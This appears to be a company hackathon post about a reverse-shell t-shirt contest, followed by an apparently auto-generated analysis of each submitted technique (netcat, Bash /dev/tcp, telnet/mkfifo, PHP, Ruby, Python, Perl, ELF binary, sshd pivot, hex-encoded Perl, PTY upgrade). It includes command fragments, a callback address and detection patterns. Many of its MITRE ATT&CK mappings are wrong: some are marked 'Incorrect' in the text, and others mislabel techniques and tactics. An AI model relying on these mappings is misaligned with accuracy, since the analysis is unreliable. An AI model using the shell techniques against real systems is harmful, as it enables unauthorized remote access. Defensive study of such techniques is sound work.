Full Report
For our internal hackathon, we wanted to produce some shirts. We ran a competition to see who could produce a reverse shell invocation most worthy of inclusion on a shirt. Here are the submissions, which may be instructive or useful. But first; the winning t-shirt design goes to Vlad (-islav, baby don’t hurt me, don’t hurt me, no more): Funny story; the printer left out the decimal points between the IP, so we had to use a permanent marker to put them back. Oh, also, many of these were originally taken from somewhere else then modified, we don’t claim the full idea as our own. Anyway, onto the shells!
Analysis Summary
# Tool/Technique: Netcat Reverse Shell (nc -e)
## Overview
A classic, compact command-line submission for establishing a raw reverse shell connection using `netcat` with the `-e` (execute) option.
## Technical Details
- Type: Tool/Technique
- Platform: Unix-like systems (requires `nc` with `-e` support)
- Capabilities: Establishes a direct shell connection over TCP.
- First Seen: Pre-2012 (as a common technique)
## MITRE ATT&CK Mapping
- TA0011 - Command and Control
- T1071 - Application Layer Protocol
- T1071.001 - Web Protocols (Less accurate, but TCP/IP is the transport)
- T1105 - Ingress Tool Transfer (If Netcat is transferred first, but here it's used for C2)
- TA0002 - Execution
- T1059 - Command and Scripting Interpreter
- T1059.004 - Unix Shell
## Functionality
### Core Capabilities
- Execute `/bin/sh` (or similar shell) and redirect its input/output over a TCP connection to a listening host.
### Advanced Features
- Extremely terse invocation (18 characters), making it suitable for constrained injection environments.
## Indicators of Compromise
- File Hashes: N/A (In-memory execution or use of standard binary)
- File Names: `nc` (netcat)
- Registry Keys: N/A
- Network Indicators: TCP connection initiated to `1.0.0.1:8` (Defanged example: `1[.]0[.]0[.]1:8` or specified attacker IP/port).
- Behavioral Indicators: Execution of `nc` with the `-e` flag followed by outgoing network connections.
## Associated Threat Actors
- General penetration testers and hobbyists. (This specific invocation is ubiquitous.)
## Detection Methods
- Signature-based detection: Searching process command lines for `nc -e`.
- Behavioral detection: Monitoring execution of Netcat paired with execution of a shell binary (`sh`, `bash`).
## Mitigation Strategies
- Remove or restrict direct execution of Netcat, especially versions compiled with the `-e` option, which is often disabled in modern builds for security reasons.
- Network filtering to block outbound connections unless explicitly authorized.
## Related Tools/Techniques
- Telnet Reverse Shell (similar methodology, slightly longer command).
---
# Tool/Technique: Bash Reverse Shell (/dev/tcp)
## Overview
A highly popular and compact reverse shell technique utilizing Bash's built-in redirection capabilities to open a connection directly to a remote host via the `/dev/tcp` pseudo-device. This was Vlad's winning submission.
## Technical Details
- Type: Technique
- Platform: Linux/Unix systems running Bash (specifically requiring `/dev/tcp` support, often absent in minimalist deployments like RHEL by default).
- Capabilities: Creates a reliable shell connection using native shell redirection.
- First Seen: Common technique, widely used since Bash supported this feature.
## MITRE ATT&CK Mapping
- TA0011 - Command and Control
- T1071 - Application Layer Protocol (TCP)
- TA0002 - Execution
- T1059 - Command and Scripting Interpreter
- T1059.004 - Unix Shell
## Functionality
### Core Capabilities
- Redirects standard input (0), standard output (1), and standard error (2) through the established TCP sockets to `/dev/tcp/[IP]/[PORT]`.
### Advanced Features
- Native language support minimizes the need for external binaries (like `nc`), often bypassing basic file presence checks.
## Indicators of Compromise
- File Hashes: N/A
- File Names: `bash`
- Registry Keys: N/A
- Network Indicators: Outbound TCP connection to `1.0.0.1:8` (Defanged example: `1[.]0[.]0[.]1:8`).
- Behavioral Indicators: Use of file descriptor redirection (`>&`, `0>&1`) combined with string literals representing network paths.
## Associated Threat Actors
- Widely used by penetration testers and potentially by actors targeting Linux environments where Bash is default.
## Detection Methods
- Signature-based detection: Searching command lines for patterns like `/dev/tcp/` and file descriptor redirection (`0>&1`).
- Behavioral detection: Monitoring for shell processes spawning unexpected, long-lived TCP connections.
## Mitigation Strategies
- Principle of Least Privilege: Restrict service accounts from running Bash if possible.
- Monitor shell history/command execution for suspicious redirection sequences.
## Related Tools/Techniques
- Perl/Python/Ruby shells (Attempting to achieve similar results using different interpreters).
---
# Tool/Technique: Telnet Reverse Shell
## Overview
A technique leveraging the `mkfifo` command to create a named pipe, then piping shell standard I/O through that pipe to a `telnet` connection. This aims for maximum compatibility since `telnet` is often present.
## Technical Details
- Type: Technique
- Platform: Unix-like systems with `mkfifo`, `telnet`, and shell access.
- Capabilities: Establishes a shell session, potentially hiding streams better than direct `nc` execution if pipes abstract the flow.
- First Seen: Common technique exploiting available utilities.
## MITRE ATT&CK Mapping
- TA0011 - Command and Control
- T1071 - Application Layer Protocol (TCP)
- TA0002 - Execution
- T1059 - Command and Scripting Interpreter
## Functionality
### Core Capabilities
- Creates a named pipe (`mkfifo x`).
- Connects `telnet` to the C2 server, using file descriptor redirection (`0x`, `2>&...`) to link the pipe to the shell session over the network connection.
### Advanced Features
- High compatibility across older or minimalist Unix installs where Netcat might be missing. Can substitute `telnet` with `nc` for brevity (33 chars).
## Indicators of Compromise
- File Hashes: N/A
- File Names: `mkfifo`, `telnet`
- Registry Keys: N/A
- Network Indicators: TCP connection to `1.0.0.1:8` (Defanged example: `1[.]0[.]0[.]1:8`).
- Behavioral Indicators: Use of `mkfifo` followed immediately by interaction with a network utility (`telnet`).
## Associated Threat Actors
- Penetration testers focused on tool scarcity.
## Detection Methods
- Monitoring process creation for the `mkfifo` utility being spawned by non-standard parent processes (e.g., a web server process).
## Mitigation Strategies
- Uninstall legacy tools like `telnet` if administrative access is required.
- Monitor for the creation of world-writable named pipes in unexpected locations.
## Related Tools/Techniques
- Netcat Reverse Shell.
---
# Tool/Technique: PHP Reverse Shell
## Overview
A submission utilizing the PHP Command Line Interface (CLI) to create a reverse shell, likely using PHP's stream wrappers for socket communication.
## Technical Details
- Type: Technique
- Platform: Systems with PHP CLI installed.
- Capabilities: Executes shell commands via PHP's stream handling, binding input/output streams to the remote socket.
- First Seen: Common technique for web shell persistence/exploitation.
## MITRE ATT&CK Mapping
- TA0002 - Execution
- T1059 - Command and Scripting Interpreter
- T1059.006 - Python (Incorrect, but covers scripting environments)
- T1059.009 - Command and Scripting Interpreter (General scripting)
## Functionality
### Core Capabilities
- Uses stream redirection (`&3`, `2>&3"`) to link the shell process STDIO streams to the established socket handled by descriptor 3.
### Advanced Features
- Requires PHP CLI to be available and executable.
## Indicators of Compromise
- File Hashes: N/A
- File Names: `php`
- Network Indicators: Inferred TCP connection to `1.0.0.1:8`.
- Behavioral Indicators: Execution of `php` passing a command string containing stream manipulation syntax.
## Associated Threat Actors
- Actors exploiting web applications that utilize PHP, pivoting to the CLI.
## Detection Methods
- Monitoring for `php` execution with command-line arguments containing socket/stream configuration syntax.
## Mitigation Strategies
- Remove PHP CLI from production servers where possible.
- Restrict execution context of PHP interpreters.
## Related Tools/Techniques
- Python/Perl shells (Utilizing scripting languages for similar effect).
---
# Tool/Technique: Ruby Reverse Shell
## Overview
A brief Ruby script submission that imports the `socket` library to establish a TCP connection and force execution of the spawned shell process using the connected file descriptor.
## Technical Details
- Type: Technique/Script
- Platform: Systems with Ruby and the `socket` library installed.
- Capabilities: Establishes raw TCP connection and executes a shell, using file descriptor inheritance.
- First Seen: Common technique leveraging Ruby's standard library.
## MITRE ATT&CK Mapping
- TA0011 - Command and Control
- T1071 - Application Layer Protocol (TCP)
- TA0002 - Execution
- T1059 - Command and Scripting Interpreter
- T1059.008 - Python (Incorrect, general scripting interpreter)
## Functionality
### Core Capabilities
- Opens a TCP client socket to the attacker.
- Uses `exec` after mapping STDIN, STDOUT, and STDERR to the socket file descriptor (`f`).
### Advanced Features
- Requires explicit invocation with `ruby -rsocket small-rev.rb`, which may be noted via command-line monitoring.
## Indicators of Compromise
- File Hashes: SHA256 hash of the script file if saved.
- File Names: `ruby`, small-rev.rb
- Network Indicators: TCP connection to `1.0.0.1:8`.
- Behavioral Indicators: Execution of `ruby` with `-r` switches, followed by network activity and process creation.
## Associated Threat Actors
- Actors leveraging installed Ruby environments.
## Detection Methods
- Monitoring for system calls related to socket creation (`connect`) initiated by the `ruby` interpreter process.
## Mitigation Strategies
- Ensure Ruby environments are patched and only run trusted scripts.
## Related Tools/Techniques
- Python, Perl shells.
---
# Tool/Technique: Python Reverse Shell
## Overview
A verbose, but highly portable Python script designed to establish a reverse shell by using the `socket` module and replacing file descriptors 0, 1, and 2 with the socket connection.
## Technical Details
- Type: Technique/Script
- Platform: Systems with Python installed.
- Capabilities: Highly reliable shell execution by manipulating standard file descriptors (`os.dup2`).
- First Seen: Common technique due to Python's prevalence.
## MITRE ATT&CK Mapping
- TA0011 - Command and Control
- T1071 - Application Layer Protocol (TCP)
- TA0002 - Execution
- T1059 - Command and Scripting Interpreter
- T1059.006 - Python
## Functionality
### Core Capabilities
- Imports `socket` and `os`.
- Creates a TCP socket, connects, and then calls `os.dup2(file_descriptor, 0/1/2)` three times to map STDIN/OUT/ERR to the socket.
- Executes `/bin/sh` using `os.system()`.
### Advanced Features
- Assumes Unix line endings, indicating targeting specific configurations.
## Indicators of Compromise
- File Hashes: SHA256 hash of the script file if saved.
- File Names: `python`, script filenames.
- Network Indicators: TCP connection to `1.0.0.1:8`.
- Behavioral Indicators: Execution of Python connecting to an external, non-standard port followed by an execution of `/bin/sh`.
## Associated Threat Actors
- Nearly all threat actors capable of scripting support Python.
## Detection Methods
- Monitoring for Python scripts that open outbound TCP sockets and subsequently execute system shells.
## Mitigation Strategies
- Implement strong controls on Python environments, especially concerning raw socket programming and `os.dup2`/`os.system` calls.
## Related Tools/Techniques
- Other interpreter-based shells (Ruby, Perl).
# Tool/Technique: Perl Reverse Shell
## Overview
A Perl script intended to establish a reverse shell using fork/exit logic to ensure the process continues, and a socket connection to handle I/O streams.
## Technical Details
- Type: Technique/Script
- Platform: Systems with Perl installed.
- Capabilities: Utilizes Perl's `fork` to background the process and `IO::Socket::INET` for network communication; redirects input/output streams to the socket.
- First Seen: Common technique dating back to early system exploitation.
## MITRE ATT&CK Mapping
- TA0011 - Command and Control
- T1071 - Application Layer Protocol (TCP)
- TA0002 - Execution
- T1059 - Command and Scripting Interpreter
- T1059.005 - Visual Basic (Incorrect, general scripting interpreter)
## Functionality
### Core Capabilities
- Forks the process (`$p=fork; exit,if($p)`).
- Creates socket connection to `1.0.0.1:8`.
- Replaces STDIN and STDOUT with the socket handle allowing interactive commands/output.
### Advanced Features
- The use of `fork` separates the connection from the parent interpreter invocation.
## Indicators of Compromise
- File Hashes: SHA256 hash of the script file if saved.
- File Names: `perl`, small-rev.pl
- Network Indicators: TCP connection to `1.0.0.1:8`.
- Behavioral Indicators: Process creation resulting in a `forked` child process that establishes a socket and then executes a shell loop via `<>`.
## Associated Threat Actors
- Actors exploiting environments where Perl is installed, common in legacy or older Unix systems.
## Detection Methods
- Monitoring for system calls related to `fork()` occurring within Perl processes that are also making external network connections.
## Mitigation Strategies
- Minimize the use and deployment of Perl on critical infrastructure.
## Related Tools/Techniques
- Python, PHP shells.
---
# Tool/Technique: ELF Executable Reverse Shell
## Overview
A submission that uses a custom-compiled ELF binary specifically designed to act as a reverse shell, utilizing hardcoded offsets and raw assembly/data structures.
## Technical Details
- Type: Malware/Tool (Specifically, a custom binary)
- Platform: Linux systems supporting ELF executables.
- Capabilities: Bypasses scripting engine monitoring by executing compiled code directly.
- First Seen: Context implies this was custom-made for the competition.
## MITRE ATT&CK Mapping
- TA0002 - Execution
- T1204 - User Execution (If downloaded and run)
- T1027 - Obfuscated Files or Information (Due to binary nature filling space)
- TA0011 - Command and Control
- T1071 - Application Layer Protocol (TCP)
## Functionality
### Core Capabilities
- Established a hardcoded connection to `127.0.0.1:8080` (deviation noted from other shells).
- Executes system functionality internally (likely via syscalls for socket creation and execution).
### Advanced Features
- Extremely difficult to analyze without reverse engineering the binary content.
- Character count (133 chars) is misleading as it represents the binary's encoded or raw form, not source code length.
## Indicators of Compromise
- File Hashes: High probability of unique hashes for this specific binary.
- File Names: Generic names or names obfuscated from the binary data.
- Network Indicators: TCP connection to `127.0.0.1:8080` (Defang: `127[.]0[.]0[.]1:8080`).
- Behavioral Indicators: Unexpected execution of a binary with suspicious network activity originating from an unusual location.
## Associated Threat Actors
- Malware developers, advanced attackers who compile custom payloads.
## Detection Methods
- File scanning for suspicious binary patterns (e.g., ELF headers followed by shellcode/data indicative of network connections).
## Mitigation Strategies
- Strict execution control (e.g., AppLocker, constrained execution policies).
- Enhanced endpoint detection looking for abnormal syscalls patterns.
## Related Tools/Techniques
- Custom backdoors written in C/C++.
---
# Tool/Technique: Usermode SSHD Pivot Shell
## Overview
A multi-step technique using standard Linux utilities (`ssh-keygen`, `bash`, `ssh`) to establish a persistent reverse connection configured to act as a local SSH daemon on the victim. This method prioritizes functionality (pivoting, port forwarding) over byte count minimization.
## Technical Details
- Type: Technique
- Platform: Unix-like systems with OpenSSH utilities installed.
- Capabilities: Establishes a legitimate-looking SSH listener on the target machine, using SSH keys for authentication, allowing for complex pivoting via SSH tunnels.
- First Seen: Known technique leveraging standard system administration tools for post-exploitation persistence and pivoting.
## MITRE ATT&CK Mapping
- TA0003 - Persistence
- T1548.002 - Bypass User Account Control (If run under compromised user context)
- TA0010 - Lateral Movement
- T1021 - Remote Services
- T1021.001 - Remote Desktop Protocol (Analogous use of remote access)
- TA0011 - Command and Control
- T1105 - Ingress Tool Transfer (If system binaries are used)
## Functionality
### Core Capabilities
- Generates a new RSA key pair (`sshd_rsa`).
- Creates a user `.ssh` directory.
- Creates an `authorized_keys` file containing the attacker's public key (implied, as the command structure sets up the listener).
- Starts a local SSH daemon (`sshd`) instance on a specified port (implicitly port 8, or another port if the user didn't specify a different one in the prompt, though the command sample implies it binds a new service).
- *Note: The article implies the reverse shell capability is achieved via pivoting/forwarding capabilities of this SSH listener, rather than a direct execution of a shell.*
### Advanced Features
- Utilizes trusted system binaries, often evading simple application whitelisting.
- Provides full SSH tunnel and port forwarding capabilities on the compromised host without needing to upload a third-party backdoor service.
## Indicators of Compromise
- File Hashes: N/A for the technique itself, but hashes of generated keys might be relevant if stored.
- File Names: `ssh-keygen`, `/tmp/sshd_rsa`, `/home/user/.ssh/authorized_keys`.
- Registry Keys: N/A
- Network Indicators: Outbound connection *or* monitoring for an unexpected local service listening on a high port (if the attacker immediately connects back).
- Behavioral Indicators: Spawning of `/usr/bin/sshd` without standard configuration paths or unusual startup behavior.
## Associated Threat Actors
- Sophisticated attackers focusing on maintaining network access (C2) and internal system pivoting.
## Detection Methods
- Monitoring for standard users executing `ssh-keygen` outside of deployment pipelines, especially creating temporary key files in `/tmp`.
- Network monitoring for dynamic local services spawning via user context.
## Mitigation Strategies
- Restrict user privileges to prevent running system services like `sshd`.
- System hardening to ensure SSH keys are managed centrally and not locally generated by end-users for unexpected connectivity.
## Related Tools/Techniques
- Using SMB/HTTP for C2 if SSH is unavailable.
---
# Tool/Technique: Encoded Perl Reverse Shell
## Overview
A modification of the standard Perl reverse shell that heavily relies on the `pack` command to encode the actual shell command (a Bash `/dev/tcp` shell) into hexadecimal strings. This technique is designed to bypass simple injection filter checks that might flag direct shell syntax characters.
## Technical Details
- Type: Technique/Script (Encoded Payload)
- Platform: Systems with Perl installed.
- Capabilities: Payload encoding via hex conversion to evade detection/injection limits, followed by dynamic decompression (`pack`) at runtime.
- First Seen: Technique common in obfuscated shellcode/payload delivery.
## MITRE ATT&CK Mapping
- TA0002 - Execution
- T1027 - Obfuscated Files or Information
- T1027.001 - Code Signing Certificates (Not applicable, but related to relying on execution context)
- T1059 - Command and Scripting Interpreter (Perl)
## Functionality
### Core Capabilities
- The core payload is the Bash `/dev/tcp` shell.
- This payload is represented as hexadecimal characters (e.g., `65786563...`).
- The command `pack qw.H..chr(42)...` decodes these hex segments back into executable bytes/characters, reassembling the shell command.
### Advanced Features
- Uses Perl's `qw...` feature combined with hex representation to avoid problematic characters during injection.
- Designed to work around small input buffers by chunking the payload.
## Indicators of Compromise
- File Hashes: Unique hashes based on the specific hex chunks used.
- File Names: Generic names or those used during initial small injection.
- Network Indicators: TCP connection upon successful decoding and execution (likely targeting `1.0.0.1:808` or port 8080, as inferred from binary context).
- Behavioral Indicators: Execution of `perl` with excessive command-line arguments containing long hex strings, immediately followed by a network connection.
## Associated Threat Actors
- Actors utilizing sophisticated web exploits where input length or character sets are severely restricted.
## Detection Methods
- Heuristic analysis of Perl command lines, flagging excessive arguments composed entirely of hexadecimal characters intended for use with `pack` or `unpack`.
## Mitigation Strategies
- Strict input validation on application injection points that receive data intended for execution interpreters.
## Related Tools/Techniques
- Base64 or other encoding schemes used in PowerShell or Python obfuscation.
---
# Tool/Technique: Python PTY Shell Upgrade
## Overview
A technique that uses a Netcat connection (already established, perhaps unstably or without TTY features) and then leverages the Python `pty` module to spawn a fully interactive pseudo-terminal (PTY) shell.
## Technical Details
- Type: Technique
- Platform: Unix-like systems with Python installed.
- Capabilities: Upgrades a basic non-interactive shell connection (like one from basic Netcat) into a stable, interactive PTY, providing features like command history, line editing, and proper terminal control characters.
- First Seen: Standard post-exploitation technique for stabilizing shells popularized around 2012-2014.
## MITRE ATT&CK Mapping
- TA0008 - Lateral Movement (Can be used to stabilize access for further action)
- TA0011 - Command and Control
- T1071 - Application Layer Protocol (TCP, used by the initial Netcat shell)
## Functionality
### Core Capabilities
- The initial step is receiving shell input via `nc` on port 80 (or another specified port).
- The Python payload then calls `pty.spawn("/bin/bash")` to remap the socket I/O to a fully functional PTY session bound to `/bin/bash`.
### Advanced Features
- Solves the common problem of handling control characters and buffer issues associated with direct C/Ncat shells.
## Indicators of Compromise
- File Hashes: N/A
- File Names: `python`, `nc`
- Network Indicators: Initial connection often to port 80 or 443 (if masqueraded), followed by stable terminal session behavior.
- Behavioral Indicators: Execution of Python importing the `pty` module immediately after a network connection has been established to the controlling process.
## Associated Threat Actors
- Any actor maintaining shell access post-compromise who requires interactive functionality.
## Detection Methods
- Monitoring for Python execution alongside calls to kernel functions related to pseudo-terminal allocation (`openpty`, `forkpty`).
## Mitigation Strategies
- Restrict python execution unless explicitly required and monitored.
- Ensure necessary modules for TTY spawning are unavailable in secure contexts.
## Related Tools/Techniques
- Python upgrade scripts using `socat`.